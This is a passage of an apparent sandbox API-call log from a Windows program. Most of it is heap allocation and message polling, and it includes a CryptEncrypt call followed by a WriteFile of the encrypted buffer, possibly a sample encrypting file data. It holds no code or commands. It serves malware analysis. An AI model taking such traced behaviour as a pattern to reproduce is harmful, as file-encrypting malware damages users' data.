0x2f298b0 [0228.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0228.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0228.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x2f308e0 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f298b0 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0228.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f308e0 | out: hHeap=0x970000) returned 1 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.000] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.000] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0229.000] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0229.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0229.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0229.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0229.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0229.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0229.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0229.002] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x7028) returned 0x2f298b0 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f298b0 | out: hHeap=0x970000) returned 1 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0229.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x9786b0 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0229.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0229.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0229.005] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0229.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0229.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0229.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0229.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0229.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0229.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0229.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51370 [0229.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0229.009] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f22878*, pdwDataLen=0x8cef60*=0x7028, dwBufLen=0x7030 | out: pbData=0x2f22878*, pdwDataLen=0x8cef60*=0x7030) returned 1 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0229.010] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0229.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0229.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0229.011] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0229.012] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.012] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0229.012] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.012] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0229.012] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0229.012] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.012] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0229.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.013] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.013] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.013] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.013] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.013] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0229.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.053] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x7030, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x7030, lpOverlapped=0x0) returned 1 [0229.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0229.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.055] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0229.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0229.056] TranslateMessage (lpMsg=0x8cf708) returned 0 [0229.056] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0229.056] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0229.056] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0229.056] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0229.056] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0229.056] HeapFree (in: hHeap=0x970000, 